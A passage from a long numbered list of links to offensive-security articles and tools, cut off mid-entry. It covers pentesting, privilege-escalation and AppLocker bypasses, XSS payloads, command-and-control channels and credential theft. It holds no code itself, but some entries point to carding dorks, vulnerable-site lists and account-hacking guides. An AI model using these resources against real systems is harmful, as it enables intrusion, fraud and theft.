-438-the-number-one-pentesting-tool-youre-not-using: https://www.shellntel.com/blog/2016/8/3/the-number-one-pentesting-tool-youre-not-using -439-uac-bypass: http://www.securitynewspaper.com/tag/uac-bypass/ -440-XSSer – Automated Framework Tool to Detect and Exploit XSS vulnerabilities: https://gbhackers.com/xsser-automated-framework-detectexploit-report-xss-vulnerabilities -441-Penetration Testing on X11 Server: http://www.hackingarticles.in/penetration-testing-on-x11-server -442-Always Install Elevated: https://pentestlab.blog/2017/02/28/always-install-elevated -443-Scanning for Active Directory Privileges & Privileged Accounts: https://adsecurity.org/?p=3658 -444-Windows Server 2016 Active Directory Features: https://adsecurity.org/?p=3646 -445-powershell: https://adsecurity.org/?tag=powershell -446-PowerShell Security: PowerShell Attack Tools, Mitigation, & Detection: https://adsecurity.org/?p=2921 -447-DerbyCon 6 (2016) Talk – Attacking EvilCorp: Anatomy of a Corporate Hack: https://adsecurity.org/?p=3214 -448-Real-World Example of How Active Directory Can Be Compromised (RSA Conference Presentation): https://adsecurity.org/?p=2085 -449-Advanced ATM Penetration Testing Methods: https://gbhackers.com/advanced-atm-penetration-testing-methods -450-Background: Microsoft Ofice Exploitation: https://rhinosecuritylabs.com/research/abusing-microsoft-word-features-phishing-subdoc/ -451-Automated XSS Finder: https://medium.com/p/4236ed1c6457 -452-Application whitelist bypass using XLL and embedded shellcode: https://rileykidd.com/.../application-whitelist-bypass-using-XLL-and-embedded-shellc -453-AppLocker Bypass – Regsvr32: https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32 -454-Nmap Scans using Hex Value of Flags: http://www.hackingarticles.in/nmap-scans-using-hex-value-flags -455-Nmap Scan with Timing Parameters: http://www.hackingarticles.in/nmap-scan-with-timing-parameters -456-OpenSSH User Enumeration Time- Based Attack with Osueta: http://www.hackingarticles.in/openssh-user-enumeration-time-based-attack-osueta -457-Penetration Testing: http://www.hackingarticles.in/web-penetration-testing/ -458-Penetration Testing on Remote Desktop (Port 3389): http://www.hackingarticles.in/penetration-testing-remote-desktop-port-3389 -459-Penetration Testing on Telnet (Port 23): http://www.hackingarticles.in/penetration-testing-telnet-port-23 -460-Penetration Testing in Windows/Active Directory with Crackmapexec: http://www.hackingarticles.in/penetration-testing-windowsactive-directory-crackmapexec -461-Penetration Testing in WordPress Website using WordPress Exploit Framework: http://www.hackingarticles.in/penetration-testing-wordpress-website-using-wordpress-exploit-framework -462-Port Scanning using Metasploit with IPTables: http://www.hackingarticles.in/port-scanning-using-metasploit-iptables -463-Post Exploitation Using WMIC (System Command): http://www.hackingarticles.in/post-exploitation-using-wmic-system-command -464-Privilege Escalation in Linux using etc/passwd file: http://www.hackingarticles.in/privilege-escalation-in-linux-using-etc-passwd-file -465-RDP Pivoting with Metasploit: http://www.hackingarticles.in/rdp-pivoting-metasploit -466-A New Way to Hack Remote PC using Xerosploit and Metasploit: http://www.hackingarticles.in/new-way-hack-remote-pc-using-xerosploit-metasploit -467-Shell to Meterpreter using Session Command: http://www.hackingarticles.in/shell-meterpreter-using-session-command -468-SMTP Pentest Lab Setup in Ubuntu (Port 25): http://www.hackingarticles.in/smtp-pentest-lab-setup-ubuntu -469-SNMP Lab Setup and Penetration Testing: http://www.hackingarticles.in/snmp-lab-setup-and-penetration-testing -470-SQL Injection Exploitation in Multiple Targets using Sqlmap: http://www.hackingarticles.in/sql-injection-exploitation-multiple-targets-using-sqlmap -471-Sql Injection Exploitation with Sqlmap and Burp Suite (Burp CO2 Plugin): http://www.hackingarticles.in/sql-injection-exploitation-sqlmap-burp-suite-burp-co2-plugin -472-SSH Penetration Testing (Port 22): http://www.hackingarticles.in/ssh-penetration-testing-port-22 -473-Manual Post Exploitation on Windows PC (System Command): http://www.hackingarticles.in/manual-post-exploitation-windows-pc-system-command -474-SSH Pivoting using Meterpreter: http://www.hackingarticles.in/ssh-pivoting-using-meterpreter -475-Stealing Windows Credentials of Remote PC with MS Office Document: http://www.hackingarticles.in/stealing-windows-credentials-remote-pc-ms-office-document -476-Telnet Pivoting through Meterpreter: http://www.hackingarticles.in/telnet-pivoting-meterpreter -477-Hack Password using Rogue Wi-Fi Access Point Attack (WiFi-Pumpkin): http://www.hackingarticles.in/hack-password-using-rogue-wi-fi-access-point-attack-wifi-pumpkin -478-Hack Remote PC using Fake Updates Scam with Ettercap and Metasploit: http://www.hackingarticles.in/hack-remote-pc-using-fake-updates-scam-with-ettercap-and-metasploit -479-Hack Remote Windows 10 Password in Plain Text using Wdigest Credential Caching Exploit: http://www.hackingarticles.in/hack-remote-windows-10-password-plain-text-using-wdigest-credential-caching-exploit -480-Hack Remote Windows 10 PC using TheFatRat: http://www.hackingarticles.in/hack-remote-windows-10-pc-using-thefatrat -481-2 Ways to Hack Windows 10 Password Easy Way: http://www.hackingarticles.in/hack-windows-10-password-easy-way -482-How to Change ALL Files Extension in Remote PC (Confuse File Extensions Attack): http://www.hackingarticles.in/how-to-change-all-files-extension-in-remote-pc-confuse-file-extensions-attack -483-How to Delete ALL Files in Remote Windows PC: http://www.hackingarticles.in/how-to-delete-all-files-in-remote-windows-pc-2 -484-How to Encrypt Drive of Remote Victim PC: http://www.hackingarticles.in/how-to-encrypt-drive-of-remote-victim-pc -485-Post Exploitation in Linux With Metasploit: https://pentestlab.blog/2013/01/04/post-exploitation-in-linux-with-metasploit -486-Red Team: https://posts.specterops.io/tagged/red-team?source=post -487-Code Signing Certi cate Cloning Attacks and Defenses: https://posts.specterops.io/tagged/code-signing?source=post -488-Phishing: https://posts.specterops.io/tagged/phishing?source=post -489-PowerPick – A ClickOnce Adjunct: http://www.sixdub.net/?p=555 -490-sql-injection-xss-playground: https://ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground -491-Privilege Escalation & Post-Exploitation: https://github.com/rmusser01/Infosec_Reference/raw/master/Draft/Privilege%20Escalation%20%26%20Post-Exploitation.md -492-https-payload-and-c2-redirectors: https://posts.specterops.io/https-payload-and-c2-redirectors-ff8eb6f87742?source=placement_card_footer_grid---------2-41 -493-a-push-toward-transparency: https://posts.specterops.io/a-push-toward-transparency-c385a0dd1e34?source=placement_card_footer_grid---------0-41 -494-bloodhound: https://posts.specterops.io/tagged/bloodhound?source=post -495-active directory: https://posts.specterops.io/tagged/active-directory?source=post -496-Load & Execute Bundles with migrationTool: https://posts.specterops.io/load-execute-bundles-with-migrationtool-f952e276e1a6?source=placement_card_footer_grid---------1-41 -497-Outlook Forms and Shells: https://sensepost.com/blog/2017/outlook-forms-and-shells/ -498-Tools: https://sensepost.com/blog/tools/ -499-2018 pentesting resources: https://sensepost.com/blog/2018/ -500-network pentest: https://securityonline.info/category/penetration-testing/network-pentest/ -501-[technical] Pen-testing resources: https://medium.com/p/cd01de9036ad -502-Stored XSS on Facebook: https://opnsec.com/2018/03/stored-xss-on-facebook/ -503-vulnerabilities: https://www.brokenbrowser.com/category/vulnerabilities/ -504-Extending BloodHound: Track and Visualize Your Compromise: https://porterhau5.com/.../extending-bloodhound-track-and-visualize-your-compromise -505-so-you-want-to-be-a-web-security-researcher: https://portswigger.net/blog/so-you-want-to-be-a-web-security-researcher -506-BugBounty — AWS S3 added to my “Bucket” list!: https://medium.com/p/f68dd7d0d1ce -507-BugBounty — API keys leakage, Source code disclosure in India’s largest e-commerce health care company: https://medium.com/p/c75967392c7e -508-BugBounty — Exploiting CRLF Injection can lands into a nice bounty: https://medium.com/p/159525a9cb62 -509-BugBounty — How I was able to bypass rewall to get RCE and then went from server shell to get root user account: https://medium.com/p/783f71131b94 -510-BugBounty — “I don’t need your current password to login into youraccount” - How could I completely takeover any user’s account in an online classi ed ads company: https://medium.com/p/e51a945b083d -511-Ping Power — ICMP Tunnel: https://medium.com/bugbountywriteup/ping-power-icmp-tunnel-31e2abb2aaea?source=placement_card_footer_grid---------1-41 -512-hacking: https://www.nextleveltricks.com/hacking/ -513-Top 8 Best YouTube Channels To Learn Ethical Hacking Online !: https://www.nextleveltricks.com/youtube-channels-to-learn-hacking/ -514-Google Dorks List 2018 | Fresh Google Dorks 2018 for SQLi: https://www.nextleveltricks.com/latest-google-dorks-list/ -515-Art of Shellcoding: Basic AES Shellcode Crypter: http://www.nipunjaswal.com/2018/02/shellcode-crypter.html -516-Big List Of Google Dorks Hacking: https://xspiyr.wordpress.com/2012/09/05/big-list-of-google-dorks-hacking/ -517-nmap-cheatsheet: https://bitrot.sh/cheatsheet/09-12-2017-nmap-cheatsheet/ -518-Aws Recon: https://enciphers.com/tag/aws-recon/ -519-Recon: https://enciphers.com/tag/recon/ -520-Subdomain Enumeration: https://enciphers.com/tag/subdomain-enumeration/ -521-Shodan: https://enciphers.com/tag/shodan/ -522-Dump LAPS passwords with ldapsearch: https://malicious.link/post/2017/dump-laps-passwords-with-ldapsearch/ -523-peepdf - PDF Analysis Tool: http://eternal-todo.com/tools/peepdf-pdf-analysis-tool -524-Evilginx 2 - Next Generation of Phishing 2FA Tokens: breakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokens/ -526-Evil XML with two encodings: https://mohemiv.com/all/evil-xml/ -527-create-word-macros-with-powershell: https://4sysops.com/archives/create-word-macros-with-powershell/ -528-Excess XSS A comprehensive tutorial on cross-site scripting: https://excess-xss.com/ -529-Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ -530-Abusing DCOM For Yet Another Lateral Movement Technique: https://bohops.com/2018/04/28/abusing-dcom-for-yet-another-lateral-movement-technique/ -531-Trust Direction: An Enabler for Active Directory Enumeration and Trust Exploitation: https://bohops.com/2017/12/02/trust-direction-an-enabler-for-active-directory-enumeration-and-trust-exploitation/ -532-Abusing DCOM For Yet Another Lateral Movement Technique: https://bohops.com/2018/04/28/abusing-dcom-for-yet-another-lateral-movement-technique/ -533-“Practical recon techniques for bug hunters & pen testers”: https://blog.appsecco.com/practical-recon-techniques-for-bug-hunters-pen-testers-at-levelup-0x02-b72c15641972?source=placement_card_footer_grid---------2-41 -534-Exploiting Node.js deserialization bug for Remote Code Execution: https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/ -535-Exploiting System Shield AntiVirus Arbitrary Write Vulnerability using SeTakeOwnershipPrivilege: http://www.greyhathacker.net/?p=1006 -536-Running Macros via ActiveX Controls: http://www.greyhathacker.net/?p=948 -537-all=BUG+MALWARE+EXPLOITS http://www.greyhathacker.net/?cat=18 -538-“FILELESS” UAC BYPASS USING EVENTVWR.EXE AND: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking -539-BYPASSING UAC ON WINDOWS 10 USING DISK CLEANUP: https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/ -540-A Look at CVE-2017-8715: Bypassing CVE-2017-0218 using PowerShell Module Manifests: https://enigma0x3.net/2017/11/06/a-look-at-cve-2017-8715-bypassing-cve-2017-0218-using-powershell-module-manifests/ -541-“FILELESS” UAC BYPASS USING SDCLT.EXE: https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe -542-File Upload XSS: https://medium.com/p/83ea55bb9a55 -543-Firebase Databases: https://medium.com/p/f651a7d49045 -544-Safe Red Team Infrastructure: https://medium.com/@malcomvetter/safe-red-team-infrastructure-c5d6a0f13fac -545-RED-TEAM: https://cybersyndicates.com/tags/red-team/ -546-Egressing Bluecoat with Cobaltstike & Let's Encrypt: https://www.youtube.com/watch?v=cgwfjCmKQwM -547-Veil-Evasion: https://cybersyndicates.com/tags/veil-evasion/ -548-Dangerous Virus For Windows Crashes Everything Hack window Using Virus: http://thelearninghacking.com/create-virus-hack-windows/ -549-Download Google Dorks List 2019: https://medium.com/p/323c8067502c -550-Don’t leak sensitive data via security scanning tools: https://medium.com/p/7d1f715f0486 -551-CRLF Injection Into PHP’s cURL Options: https://medium.com/@tomnomnom/crlf-injection-into-phps-curl-options-e2e0d7cfe545?source=placement_card_footer_grid---------0-60 -552-Open Redirects & Security Done Right!: https://medium.com/@AkshaySharmaUS/open-redirects-security-done-right-e524a3185496?source=placement_card_footer_grid---------2-60 -553-DOM XSS – auth.uber.com: https://stamone-bug-bounty.blogspot.com/2017/10/dom-xss-auth_14.html -554-PowerPoint and Custom Actions: https://cofense.com/powerpoint-and-custom-actions/ -555-exploiting-adobe-coldfusion: https://codewhitesec.blogspot.com/2018/03/exploiting-adobe-coldfusion.html -556-Command and Control – HTTPS: https://pentestlab.blog/2017/10/04/command-and-control-https -557-Command and Control – Images: https://pentestlab.blog/2018/01/02/command-and-control-images -558-Command and Control – JavaScript: https://pentestlab.blog/2018/01/08/command-and-control-javascript -559-XSS-Payloads: https://github.com/Pgaijin66/XSS-Payloads -560-Command and Control – Web Interface: https://pentestlab.blog/2018/01/03/command-and-control-web-interface -561-Command and Control – Website: https://pentestlab.blog/2017/11/14/command-and-control-website -562-Command and Control – WebSocket: https://pentestlab.blog/2017/12/06/command-and-control-websocket -563-atomic-red-team: https://github.com/redcanaryco/atomic-red-team -564-PowerView-3.0-tricks.ps1: https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 -565-awesome-sec-talks: https://github.com/PaulSec/awesome-sec-talks -566-Awesome-Red-Teaming: https://github.com/yeyintminthuhtut/Awesome-Red-Teaming -567-awesome-php: https://github.com/ziadoz/awesome-php -568-latest-hacks: https://hackercool.com/latest-hacks/ -569-GraphQL NoSQL Injection Through JSON Types: http://www.east5th.co/blog/2017/06/12/graphql-nosql-injection-through-json-types/ -570-Writing .NET Executables for Pentesters: https://www.peew.pw/blog/2017/12/4/writing-net-executables-for-penteters-part-2 -571-A curated list of fuzzing resources ( Books, courses - free and paid, videos, tools, tutorials and vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis. https://github.com/secfigo/Awesome-Fuzzing -572-How to Shutdown, Restart, Logoff, and Hibernate Remote Windows PC: http://www.hackingarticles.in/how-to-shutdown-restart-logoff-and-hibernate-remote-windows-pc -572-Injecting Metasploit Payloads into Android Applications – Manually: https://pentestlab.blog/2017/06/26/injecting-metasploit-payloads-into-android-applications-manually -573-Google Dorks For Carding [Huge List] - Part 1: https://hacker-arena.blogspot.com/2014/03/google-dorks-for-carding-huge-list-part.html -574-Google dorks for growth hackers: https://medium.com/p/7f83c8107057 -575-Google Dorks For Carding (HUGE LIST): https://leetpedia.blogspot.com/2013/01/google-dorks-for-carding-huge-list.html -576-BIGGEST SQL Injection Dorks List ~ 20K+ Dorks: https://leetpedia.blogspot.com/2013/05/biggest-sql-injection-dorks-list-20k.html -577-Pastebin Accounts Hacking (Facebook/Paypal/LR/Gmail/Yahoo, etc): https://leetpedia.blogspot.com/2013/01/pastebin-accounts-hacking.html -578-How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!: http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html -579-Hijacking VNC (Enum, Brute, Access and Crack): https://medium.com/p/d3d18a4601cc -580-Linux Post Exploitation Command List: https://github.com/mubix/post-exploitation/wiki -581-List of google dorks for sql injection: https://deadlyhacker.wordpress.com/2013/05/09/list-of-google-dorks-for-sql-injection/ -582-Microsoft Office – NTLM Hashes via Frameset: https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset -583-Microsoft Windows 10 - Child Process Restriction Mitigation Bypass: https://www.exploit-db.com/download/44888.txt -584-Microsoft Windows CVE-2018-8210 Remote Code Execution Vulnerability: https://www.securityfocus.com/bid/104407 -585-Microsoft Windows Kernel CVE-2018-0982 Local Privilege Escalation Vulnerability: https://www.securityfocus.com/bid/104382 -586-miSafes Mi-Cam Device Hijacking: https://packetstormsecurity.com/files/146504/SA-20180221-0.txt -587-Low-Level Windows API Access From PowerShell: https://www.fuzzysecurity.com/tutorials/24.html -588-Linux Kernel 'mm/hugetlb.c' Local Denial of Service Vulnerability: https://www.securityfocus.com/bid/103316 -589-Lateral Movement – RDP: https://pentestlab.blog/2018/04/24/lateral-movement-rdp/ -590-Snagging creds from locked machines: https://malicious.link/post/2016/snagging-creds-from-locked-machines/ -591-Making a Blind SQL Injection a Little Less Blind: https://medium.com/p/428dcb614ba8 -592-VulnHub — Kioptrix: Level 5: https://medium.com/@bondo.mike/vulnhub-kioptrix-level-5-88ab65146d48?source=placement_card_footer_grid---------1-60 -593-Unauthenticated Account Takeover Through HTTP Leak: https://medium.com/p/33386bb0ba0b -594-Hakluke’s Ultimate OSCP Guide: Part 1 — Is OSCP for you?: https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-1-is-oscp-for-you-b57cbcce7440?source=placement_card_footer_grid---------2-43 -595-Finding Target-relevant Domain Fronts: https://medium.com/@vysec.private/finding-target-relevant-domain-fronts-7f4ad216c223?source=placement_card_footer_grid---------0-44 -596-Safe Red Team Infrastructure: https://medium.com/@malcomvetter/safe-red-team-infrastructure-c5d6a0f13fac?source=placement_card_footer_grid---------1-60 -597-Cobalt Strike Visualizations: https://medium.com/@001SPARTaN/cobalt-strike-visualizations-e6a6e841e16b?source=placement_card_footer_grid---------2-60 -598-OWASP Top 10 2017 — Web Application Security Risks: https://medium.com/p/31f356491712 -599-XSS-Auditor — the protector of unprotected: https://medium.com/bugbountywriteup/xss-auditor-the-protector-of-unprotected-f900a5e15b7b?source=placement_card_footer_grid---------0-60 -600-Netcat vs Cryptcat – Remote Shell to Control Kali Linux from Windows machine: https://gbhackers.com/netcat-vs-cryptcat -601-Jenkins Servers Infected With Miner.: https://medium.com/p/e370a900ab2e -602-cheat-sheet: http://pentestmonkey.net/category/cheat-sheet -603-Command and Control – Website Keyword: https://pentestlab.blog/2017/09/14/command-and-control-website-keyword/ -604-Command and Control – Twitter: https://pentestlab.blog/2017/09/26/command-and-control-twitter/ -605-Command and Control – Windows COM: https://pentestlab.blog/2017/09/01/command-and-control-windows-com/ -606-Microsoft Office – NTLM Hashes via Frameset: https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset/ -607-PHISHING AGAINST PROTECTED VIEW: https://enigma0x3.net/2017/07/13/phishing-against-protected-view/ -608-PHISHING WITH EMPIRE: https://enigma0x3.net/2016/03/15/phishing-with-empire/ -609-Reverse Engineering Android Applications: https://pentestlab.blog/2017/02/06/reverse-engineering-android-applications/ -610-HTML Injection: https://pentestlab.blog/2013/06/26/html-injection/ -611-Meterpreter stage AV/IDS evasion with powershell: https://arno0x0x.wordpress.com/2016/04/13/meterpreter-av-ids-evasion-powershell/ -612-Windows Atomic Tests by ATT&CK Tactic & Technique: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/windows-index.md -613-Windows Active Directory Post Exploitation Cheatsheet: https://medium.com/p/48c2bd70388 -614-Windows 10 UAC Loophole Can Be Used to Infect Systems with Malware: http://news.softpedia.com/news/windows-10-uac-loophole-can-be-used-to-infect-systems-with-malware-513996.shtml -615-How to Bypass Anti-Virus to Run Mimikatz: https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/ -616-Userland API Monitoring and Code Injection Detection: https://0x00sec.org/t/userland-api-monitoring-and-code-injection-detection/5565 -617-USE TOR. USE EMPIRE.: http://secureallthethings.blogspot.com/2016/11/use-tor-use-empire.html -617-ADVANCED CROSS SITE SCRIPTING (XSS) CHEAT SHEET: https://www.muhaddis.info/advanced-cross-site-scripting-xss-cheat-sheet/ -618-Empire without PowerShell.exe: https://bneg.io/2017/07/26/empire-without-powershell-exe/ -619-RED TEAM: https://bneg.io/category/red-team/ -620-PDF Tools: https://blog.didierstevens.com/programs/pdf-tools/ -621-DNS Data ex ltration — What is this and How to use? https://blog.fosec.vn/dns-data-exfiltration-what-is-this-and-how-to-use-2f6c69998822 -621-Google Dorks: https://medium.com/p/7cfd432e0cf3 -622-Hacking with JSP Shells: https://blog.netspi.com/hacking-with-jsp-shells/ -623-Malware Analysis: https://github.com/RPISEC/Malware/raw/master/README.md -624-A curated list of Capture The Flag (CTF) frameworks, libraries, resources and softwares.: https://github.com/SandySekharan/CTF-tool -625-Group Policy Preferences: https://pentestlab.blog/2017/03/20/group-policy-preferences -627-CHECKING FOR MALICIOUSNESS IN AC OFORM OBJECTS ON PDF FILES: https://furoner.wordpress.com/2017/11/15/checking-for-maliciousness-in-acroform-objects-on-pdf-files -628-deobfuscation: https://furoner.wordpress.com/tag/deobfuscation/ -629-POWERSHELL EMPIRE STAGERS 1: PHISHING WITH AN OFFICE MACRO AND EVADING AVS: https://fzuckerman.wordpress.com/2016/10/06/powershell-empire-stagers-1-phishing-with-an-office-macro-and-evading-avs/ -630-A COMPREHENSIVE TUTORIAL ON CROSS-SITE SCRIPTING: https://fzuckerman.wordpress.com/2016/10/06/a-comprehensive-tutorial-on-cross-site-scripting/ -631-GCAT – BACKDOOR EM PYTHON: https://fzuckerman.wordpress.com/2016/10/06/gcat-backdoor-em-python/ -632-Latest Carding Dorks List for Sql njection 2019: https://latestechnews.com/carding-dorks/ -633-google docs for credit card: https://latestechnews.com/tag/google-docs-for-credit-card/ -634-How To Scan Multiple Organizations With Shodan and Golang (OSINT): https://medium.com/p/d994ba6a9587 -635-How to Evade Application Whitelisting Using REGSVR32: https://www.blackhillsinfosec.com/evade-application-whitelisting-using-regsvr32/ -636-phishing: https://www.blackhillsinfosec.com/tag/phishing/ -637-Merlin in action: Intro to Merlin: https://asciinema.org/a/ryljo8qNjHz1JFcFDK7wP6e9I -638-IP Cams from around the world: https://medium.com/p/a6f269f56805 -639-Advanced Cross Site Scripting(XSS) Cheat Sheet by Jaydeep Dabhi: https://jaydeepdabhi.wordpress.com/2016/01/12/advanced-cross-site-scriptingxss-cheat-sheet-by-jaydeep-dabhi/ -640-Just how easy it is to do a domain or subdomain take over!?: https://medium.com/p/265d635b43d8 -641-How to Create hidden user in Remote PC: http://www.hackingarticles.in/create-hidden-remote-metaspolit -642-Process Doppelgänging – a new way to impersonate a process: https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/ -643-How to turn a DLL into astandalone EXE: https://hshrzd.wordpress.com/2016/07/21/how-to-turn-a-dll-into-a-standalone-exe/ -644-Hijacking extensions handlers as a malware persistence method: https://hshrzd.wordpress.com/2017/05/25/hijacking-extensions-handlers-as-a-malware-persistence-method/ -645-I'll Get Your Credentials ... Later!: https://www.fuzzysecurity.com/tutorials/18.html -646-Game Over: CanYouPwnMe > Kevgir-1: https://www.fuzzysecurity.com/tutorials/26.html -647-IKARUS anti.virus and its 9 exploitable kernel vulnerabilities: http://www.greyhathacker.net/?p=995 -648-Getting started in Bug Bounty: https://medium.com/p/7052da28445a -649-Union SQLi Challenges (Zixem Write-up): https://medium.com/ctf-writeups/union-sqli-challenges-zixem-write-up-4e74ad4e88b4?source=placement_card_footer_grid---------2-60 -650-scanless – A Tool for Perform Anonymous Port Scan on Target Websites: https://gbhackers.com/scanless-port-scans-websites-behalf -651-WEBAPP PENTEST: https://securityonline.info/category/penetration-testing/webapp-pentest/ -652-Cross-Site Scripting (XSS) Payloads: https://securityonline.info/tag/cross-site-scripting-xss-payloads/ -653-sg1: swiss army knife for data encryption, exfiltration & covert communication: https://securityonline.info/tag/sg1/ -654-NETWORK PENTEST: https://securityonline.info/category/penetration-testing/network-pentest/ -655-SQL injection in an UPDATE query - a bug bounty story!: https://zombiehelp54.blogspot.com/2017/02/sql-injection-in-update-query-bug.html -656-Cross-site Scripting: https://www.netsparker.com/blog/web-security/cross-site-scripting-xss/ -657-Local File Inclusion: https://www.netsparker.com/blog/web-security/local-file-inclusion-vulnerability/ -658-Command Injection: https://www.netsparker.com/blog/web-security/command-injection-vulnerability/ -659-a categorized list of Windows CMD commands: https://ss64.com/nt/commands.html -660-Understanding Guide for Nmap Timing Scan (Firewall Bypass): http://www.hackingarticles.in/understanding-guide-nmap-timing-scan-firewall-bypass -661-RFID Hacking with The Proxmark 3: https://blog.kchung.co/tag/rfid/ -662-A practical guide to RFID badge copying: https://blog.nviso.be/2017/01/11/a-practical-guide-to-rfid-badge-copying -663-Denial of Service using Cookie Bombing: https://medium.com/p/55c2d0ef808c -664-Vultr Domain Hijacking: https://vincentyiu.co.uk/red-team/cloud-security/vultr-domain-hijacking -665-Command and Control: https://vincentyiu.co.uk/red-team/domain-fronting -666-Cisco Auditing Tool & Cisco Global Exploiter to Exploit 14 Vulnerabilities in Cisco Switches and Routers: https://gbhackers.com/cisco-global-exploiter-cge -667-CHECKING FOR MALICIOUSNESS IN ACROFORM OBJECTS ON PDF FILES: https://furoner.wordpress.com/2017/11/15/checking-for-maliciousness-in-acroform-objects-on-pdf-files -668-Situational Awareness: https://pentestlab.blog/2018/05/28/situational-awareness/ -669-Unquoted Service Path: https://pentestlab.blog/2017/03/09/unquoted-service-path -670-NFS: https://pentestacademy.wordpress.com/2017/09/20/nfs/ -671-List of Tools for Pentest Rookies: https://pentestacademy.wordpress.com/2016/09/20/list-of-tools-for-pentest-rookies/ -672-Common Windows Commands for Pentesters: https://pentestacademy.wordpress.com/2016/06/21/common-windows-commands-for-pentesters/ -673-Open-Source Intelligence (OSINT) Reconnaissance: https://medium.com/p/75edd7f7dada -674-OSINT x UCCU Workshop on Open Source Intelligence: https://www.slideshare.net/miaoski/osint-x-uccu-workshop-on-open-source-intelligence -675-Advanced Attack Techniques: https://www.cyberark.com/threat-research-category/advanced-attack-techniques/ -676-Credential Theft: https://www.cyberark.com/threat-research-category/credential-theft/ -678-The Cloud Shadow Admin Threat: 10 Permissions to Protect: https://www.cyberark.com/threat-research-blog/cloud-shadow-admin-threat-10-permissions-protect/ -679-Online Credit Card Theft: Today’s Browsers Store Sensitive Information Deficiently, Putting User Data at Risk: https://www.cyberark.com/threat-research-blog/online-credit-card-theft-todays-browsers-store-sensitive-information-deficiently-putting-user-data-risk/ -680-Weakness Within: Kerberos Delegation: https://www.cyberark.com/threat-research-blog/weakness-within-kerberos-delegation/ -681-Simple Domain Fronting PoC with GAE C2 server: https://www.securityartwork.es/2017/01/31/simple-domain-fronting-poc-with-gae-c2-server/ -682-Find Critical Information about a Host using DMitry: https://www.thehackr.com/find-critical-information-host-using-dmitry/ -683-How To Do OS Fingerprinting In Kali Using Xprobe2: http://disq.us/?url=http%3A%2F%2Fwww.thehackr.com%2Fos-fingerprinting-kali%2F&key=scqgRVMQacpzzrnGSOPySA -684-Crack SSH, FTP, Telnet Logins Using Hydra: https://www.thehackr.com/crack-ssh-ftp-telnet-logins-using-hydra/ -685-Reveal Saved Passwords in Browser using JavaScript Injection: https://www.thehackr.com/reveal-saved-passwords-browser-using-javascript-injection/ -686-Nmap Cheat Sheet: https://s3-us-west-2.amazonaws.com/stationx-public-download/nmap_cheet_sheet_0.6.pdf -687-Manual Post Exploitation on Windows PC (Network Command): http://www.hackingarticles.in/manual-post-exploitation-windows-pc-network-command -688-Hack Gmail or Facebook Password of Remote PC using NetRipper Exploitation Tool: http://www.hackingarticles.in/hack-gmail-or-facebook-password-of-remote-pc-using-netripper-exploitation-tool -689-Hack Locked Workstation Password in Clear Text: http://www.hackingarticles.in/hack-locked-workstation-password-clear-text -690-How to Find ALL Excel, Office, PDF, and Images in Remote PC: http://www.hackingarticles.in/how-to-find-all-excel-office-pdf-images-files-in-remote-pc -691-red-teaming: https://www.redteamsecure.com/category/red-teaming/ -692-Create a Fake AP and Sniff Data mitmAP: http://www.uaeinfosec.com/create-fake-ap-sniff-data-mitmap/ -693-Bruteforcing From Nmap Output BruteSpray: http://www.uaeinfosec.com/bruteforcing-nmap-output-brutespray/ -694-Reverse Engineering Framework radare2: http://www.uaeinfosec.com/reverse-engineering-framework-radare2/ -695-Automated ettercap TCP/IP Hijacking Tool Morpheus: http://www.uaeinfosec.com/automated-ettercap-tcpip-hijacking-tool-morpheus/ -696-List Of Vulnerable SQL Injection Sites: https://www.blogger.com/share-post.g?blogID=1175829128367570667&postID=4652029420701251199 -697-Command and Control – Gmail: https://pentestlab.blog/2017/08/03/command-and-control-gmail/ -698-Command and Control – DropBox: https://pentestlab.blog/2017/08/29/command-and-control-dropbox/ -699-Skeleton Key: https://pentestlab.blog/2018/04/10/skeleton-key/ -700-Secondary Logon Handle: https://pentestlab.blog/2017/04/07/secondary-logon-handle -701-Hot Potato: https://pentestlab.blog/2017/04/13/hot-potato -702-Leveraging INF-SCT Fetch & Execute Techniques For Bypass, Evasion, & Persistence (Part 2): https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ -703-Linux-Kernel-exploits: http://tacxingxing.com/category/exploit/kernel-exploit/ -704-Linux-Kernel-Exploit Stack Smashing: http://tacxingxing.com/2018/02/26/linuxkernelexploit-stack-smashing/ -705-Linux Kernel Exploit Environment: http://tacxingxing.com/2018/02/15/linuxkernelexploit-huan-jing-da-jian/ -706-Linux-Kernel-Exploit NULL dereference: http://tacxingxing.com/2018/02/22/linuxkernelexploit-null-dereference/ -707-Apache mod_python for red teams: https://labs.nettitude.com/blog/apache-mod_python-for-red-teams/ -708-Bounty Write-up (HTB): https://medium.com/p/9b01c934dfd2/ 709-CTF Writeups: https://medium.com/ctf-writeups -710-Detecting Malicious Microsoft Office Macro Documents: http://www.greyhathacker.net/?p=872 -711-SQL injection in Drupal: https://hackerone.com/reports/31756 -712-XSS and open redirect on Twitter: https://hackerone.com/reports/260744 -713-Shopify login open redirect: https://hackerone.com/reports/55546 -714-HackerOne interstitial redirect: https://hackerone.com/reports/111968 -715-Ubiquiti sub-domain takeovers: https://hackerone.com/reports/181665 -716-Scan.me pointing to Zendesk: https://hackerone.com/reports/114134 -717-Starbucks' sub-domain takeover: https://hackerone.com/reports/325336 -718-Vine's sub-domain takeover: https://hackerone.com/reports/32825 -719-Uber's 